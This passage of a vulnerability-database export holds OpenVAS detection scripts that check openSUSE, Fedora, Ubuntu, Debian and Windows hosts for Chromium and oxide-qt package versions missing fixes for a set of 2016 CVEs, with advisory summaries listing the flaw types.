script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-14T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:3108-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851453", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851453", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851453\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 05:54:12 +0100 (Wed, 14 Dec 2016)\");\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\",\n \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\",\n \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\",\n \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\",\n \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\",\n \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:3108-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update to Chromium 55.0.2883.75 fixes the following vulnerabilities:\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other\n initiatives\n\n The default bookmarks override was removed.\n\n The following packaging changes are included:\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n\n - Chromium now requires harfbuzz = 1.3.0\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:3108-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~55.0.2883.75~148.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:38:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2016-e0e1cb2b2b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5202", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872153", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872153\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:04:03 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e0e1cb2b2b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZECS3A7ULG4B4YXBKUZMA3NTQBE5HGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:38:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-16T00:00:00", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2016-a815b7bf5d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5202", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5218", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872151", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872151", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-a815b7bf5d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872151\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:15 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-a815b7bf5d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-a815b7bf5d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LGZO2VOGJOZUUXNQITD6YMIUQ2L5GTU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:37:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-3153-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-9651", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5219", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5204", "CVE-2016-5226"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842990", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842990", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-3153-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842990\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-10 06:13:45 +0100 (Sat, 10 Dec 2016)\");\n script_cve_id(\"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\",\n \t\t\"CVE-2016-5209\", \"CVE-2016-5212\", \"CVE-2016-5215\", \"CVE-2016-5222\",\n\t\t\"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n\t\t\"CVE-2016-9652\", \"CVE-2016-5213\", \"CVE-2016-5219\", \"CVE-2016-9651\",\n\t\t\"CVE-2016-5221\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-3153-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were discovered\n in Chromium. If a user were tricked in to opening a specially crafted website,\n an attacker could potentially exploit these to conduct cross-site scripting\n (XSS) attacks, read uninitialized memory, obtain sensitive information, spoof\n the webview URL, bypass same origin restrictions, cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-5204,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5212,\nCVE-2016-5215, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226,\nCVE-2016-9650, CVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit these to obtain sensitive information, cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-5213,\nCVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via application crash, or execute\narbitrary code. (CVE-2016-5221)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3153-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3153-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:36:37", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181\nA cross-site scripting issue was discovered.\n\nCVE-2016-5182\nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187\nLuan Herrera discovered a URL spoofing issue.\n\nDescription truncated. Please see the references for more information.", "cvss3": {}, "published": "2016-12-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3731-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5183", "CVE-2016-5182", "CVE-2016-5208", "CVE-2016-5191", "CVE-2016-5186", "CVE-2016-5217", "CVE-2016-9651", "CVE-2016-5184", "CVE-2016-5211", "CVE-2016-9652", "CVE-2016-9650", "CVE-2016-5202", "CVE-2016-5222", "CVE-2016-5209", "CVE-2016-5189", "CVE-2016-5205", "CVE-2016-5221", "CVE-2016-5220", "CVE-2016-5198", "CVE-2016-5194", "CVE-2016-5219", "CVE-2016-5216", "CVE-2016-5207", "CVE-2016-5215", "CVE-2016-5185", "CVE-2016-5193", "CVE-2016-5218", "CVE-2016-5190", "CVE-2016-5181", "CVE-2016-5203", "CVE-2016-5213", "CVE-2016-5212", "CVE-2016-5214", "CVE-2016-5223", "CVE-2016-5206", "CVE-2016-5210", "CVE-2016-5200", "CVE-2016-5199", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5201", "CVE-2016-5204", "CVE-2016-5187", "CVE-2016-5226"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703731", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3731.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3731-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703731\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\",\n \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\",\n \"CVE-2016-5193\", \"CVE-2016-5194\", \"CVE-2016-5198\", \"CVE-2016-5199\",\n \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\",\n \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\",\n \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\",\n \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\",\n \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\",\n \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_name(\"Debian Security Advisory DSA 3731-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3731.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n 